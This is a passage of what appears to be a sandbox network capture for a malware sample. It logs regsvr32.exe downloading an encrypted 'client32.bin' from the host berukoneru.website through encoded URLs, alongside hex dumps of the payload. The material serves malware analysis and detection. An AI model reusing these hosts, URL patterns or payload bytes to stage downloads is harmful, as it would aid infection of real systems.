                        Content-Type: application/zip
                        Content-Length: 1869
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=0egjoe75dvn618qck4vl9caql1; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:08 UTC1899INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                        Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.54979779.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:07 UTC209OUTGET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:07 UTC290INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 213639
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=6e2b9843h042p8pk0q33ujpg11; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:07 UTC290INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                        Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                        2021-12-14 09:34:07 UTC306INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                        Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
                        2021-12-14 09:34:07 UTC434INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 1a 34 bf 6c 83
                        Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                        2021-12-14 09:34:07 UTC450INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                        Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
                        2021-12-14 09:34:07 UTC466INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                        Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
                        2021-12-14 09:34:07 UTC499INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                        Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                        2021-12-14 09:34:07 UTC515INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                        Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                        2021-12-14 09:34:07 UTC531INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                        Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                        2021-12-14 09:34:07 UTC547INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                        Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                        2021-12-14 09:34:07 UTC563INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                        Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                        2021-12-14 09:34:07 UTC579INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                        Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                        2021-12-14 09:34:07 UTC595INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                        Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                        2021-12-14 09:34:07 UTC611INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                        Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                        2021-12-14 09:34:07 UTC627INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                        Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        3192.168.2.54979879.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:07 UTC628OUTGET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:07 UTC629INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 213639
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=6ibnq2u0g0h401bek74k8hvu83; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:07 UTC629INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                        Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                        2021-12-14 09:34:07 UTC645INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                        Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
